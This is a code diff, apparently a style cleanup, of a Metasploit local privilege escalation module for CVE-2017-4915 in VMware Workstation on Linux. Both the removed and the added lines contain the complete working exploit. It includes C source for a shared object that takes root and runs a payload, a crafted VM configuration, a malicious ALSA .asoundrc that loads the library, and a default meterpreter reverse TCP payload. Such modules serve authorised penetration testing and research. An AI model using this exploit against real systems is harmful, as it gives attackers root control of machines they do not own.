@@ -15,19 +15,20 @@ class MetasploitModule < Msf::Exploit::Local
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'VMware Workstation ALSA Config File Local Privilege Escalation',
-      'Description'    => %q{
-        This module exploits a vulnerability in VMware Workstation Pro and
-        Player on Linux which allows users to escalate their privileges by
-        using an ALSA configuration file to load and execute a shared object
-        as root when launching a virtual machine with an attached sound card.
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware Workstation ALSA Config File Local Privilege Escalation',
+        'Description' => %q{
+          This module exploits a vulnerability in VMware Workstation Pro and
+          Player on Linux which allows users to escalate their privileges by
+          using an ALSA configuration file to load and execute a shared object
+          as root when launching a virtual machine with an attached sound card.
 
-        This module has been tested successfully on VMware Player version
-        12.5.0 on Debian Linux 8 Jessie.
-      },
-      'References'     =>
-        [
+          This module has been tested successfully on VMware Player version
+          12.5.0 on Debian Linux 8 Jessie.
+        },
+        'References' => [
           [ 'CVE', '2017-4915' ],
           [ 'EDB', '42045' ],
           [ 'BID', '98566' ],
@@ -36,35 +37,34 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2017-0009.html' ],
           [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1142' ]
         ],
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Jann Horn',    # Discovery and PoC
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jann Horn', # Discovery and PoC
           'bcoles' # Metasploit
         ],
-      'DisclosureDate' => '2017-05-22',
-      'Platform'       => 'linux',
-      'Targets'        =>
-        [
+        'DisclosureDate' => '2017-05-22',
+        'Platform' => 'linux',
+        'Targets' => [
           [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
           [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
         ],
-      'DefaultOptions' =>
-        {
-          'AppendExit'  => true,
+        'DefaultOptions' => {
+          'AppendExit' => true,
           'PrependFork' => true,
-          'WfsDelay'    => 30,
-          'Payload'     => 'linux/x64/meterpreter_reverse_tcp'
+          'WfsDelay' => 30,
+          'Payload' => 'linux/x64/meterpreter_reverse_tcp'
         },
-      'Arch'           => [ ARCH_X86, ARCH_X64 ],
-      'SessionTypes'   => [ 'shell', 'meterpreter' ],
-      'Privileged'     => true,
-      'Notes'          =>
-        {
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Privileged' => true,
+        'Notes' => {
           'Reliability' => [ REPEATABLE_SESSION ],
-          'Stability'   => [ CRASH_SAFE ]
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
         },
-      'DefaultTarget'  => 1))
+        'DefaultTarget' => 1
+      )
+    )
     register_advanced_options [
       OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']),
       OptString.new('Xdisplay', [true, 'Display exploit will attempt to use', ':0'])
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Local
     c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
   end
 
-  def upload_and_compile(path, data, gcc_args='')
+  def upload_and_compile(path, data, gcc_args = '')
     upload "#{path}.c", data
 
     gcc_cmd = "gcc -o #{path} #{path}.c"
@@ -176,74 +176,74 @@ class MetasploitModule < Msf::Exploit::Local
     # Create shared object
     payload_name = rand_text_alphanumeric(10..15)
     so_name = rand_text_alphanumeric(10..15)
-    so = <<-EOF
-/*
-Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1142
-Original shared object code by jhorn
-*/
+    so = <<~EOF
+      /*
+      Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1142
+      Original shared object code by jhorn
+      */
 
-#define _GNU_SOURCE
-#include <stdlib.h>
-#include <string.h>
-#include <stdio.h>
-#include <unistd.h>
-#include <fcntl.h>
-#include <sys/prctl.h>
-#include <err.h>
+      #define _GNU_SOURCE
+      #include <stdlib.h>
+      #include <string.h>
+      #include <stdio.h>
+      #include <unistd.h>
+      #include <fcntl.h>
+      #include <sys/prctl.h>
+      #include <err.h>
 
-extern char *program_invocation_short_name;
+      extern char *program_invocation_short_name;
 
-__attribute__((constructor)) void run(void) {
-  uid_t ruid, euid, suid;
-  if (getresuid(&ruid, &euid, &suid))
-    err(1, "getresuid");
-  if (ruid == 0 || euid == 0 || suid == 0) {
-    if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
-      err(1, "setresxid");
-    system("#{vm_dir}/#{payload_name}");
-    _exit(0);
-  }
-}
-EOF
+      __attribute__((constructor)) void run(void) {
+        uid_t ruid, euid, suid;
+        if (getresuid(&ruid, &euid, &suid))
+          err(1, "getresuid");
+        if (ruid == 0 || euid == 0 || suid == 0) {
+          if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
+            err(1, "setresxid");
+          system("#{vm_dir}/#{payload_name}");
+          _exit(0);
+        }
+      }
+    EOF
 
     upload_and_compile "#{vm_dir}/#{so_name}.so", strip_comments(so), '-fPIC -shared -Wall -ldl -std=gnu99'
 
     # Create virtual machine
-    vmx = <<-EOF
-.encoding = "UTF-8"
-config.version = "8"
-virtualHW.version = "8"
-scsi0.present = "FALSE"
-memsize = "4"
-ide0:0.present = "FALSE"
-sound.present = "TRUE"
-sound.fileName = "-1"
-sound.autodetect = "TRUE"
-vmci0.present = "FALSE"
-hpet0.present = "FALSE"
-displayName = "#{vmx_name}"
-guestOS = "other"
-nvram = "#{vmx_name}.nvram"
-virtualHW.productCompatibility = "hosted"
-gui.exitOnCLIHLT = "FALSE"
-powerType.powerOff = "soft"
-powerType.powerOn = "soft"
-powerType.suspend = "soft"
-powerType.reset = "soft"
-floppy0.present = "FALSE"
-monitor_control.disable_longmode = 1
-EOF
+    vmx = <<~EOF
+      .encoding = "UTF-8"
+      config.version = "8"
+      virtualHW.version = "8"
+      scsi0.present = "FALSE"
+      memsize = "4"
+      ide0:0.present = "FALSE"
+      sound.present = "TRUE"
+      sound.fileName = "-1"
+      sound.autodetect = "TRUE"
+      vmci0.present = "FALSE"
+      hpet0.present = "FALSE"
+      displayName = "#{vmx_name}"
+      guestOS = "other"
+      nvram = "#{vmx_name}.nvram"
+      virtualHW.productCompatibility = "hosted"
+      gui.exitOnCLIHLT = "FALSE"
+      powerType.powerOff = "soft"
+      powerType.powerOn = "soft"
+      powerType.suspend = "soft"
+      powerType.reset = "soft"
+      floppy0.present = "FALSE"
+      monitor_control.disable_longmode = 1
+    EOF
 
     upload "#{vm_dir}/#{vmx_name}.vmx", vmx
     upload_and_chmodx "#{vm_dir}/#{payload_name}", generate_payload_exe
 
     # Create ALSA sound config
-    asoundrc = <<-EOF
-hook_func.pulse_load_if_running {
-  lib "#{vm_dir}/#{so_name}.so"
-  func "conf_pulse_hook_load_if_running"
-}
-EOF
+    asoundrc = <<~EOF
+      hook_func.pulse_load_if_running {
+        lib "#{vm_dir}/#{so_name}.so"
+        func "conf_pulse_hook_load_if_running"
+      }
+    EOF
 
     upload "#{home_dir}/.asoundrc", asoundrc
 
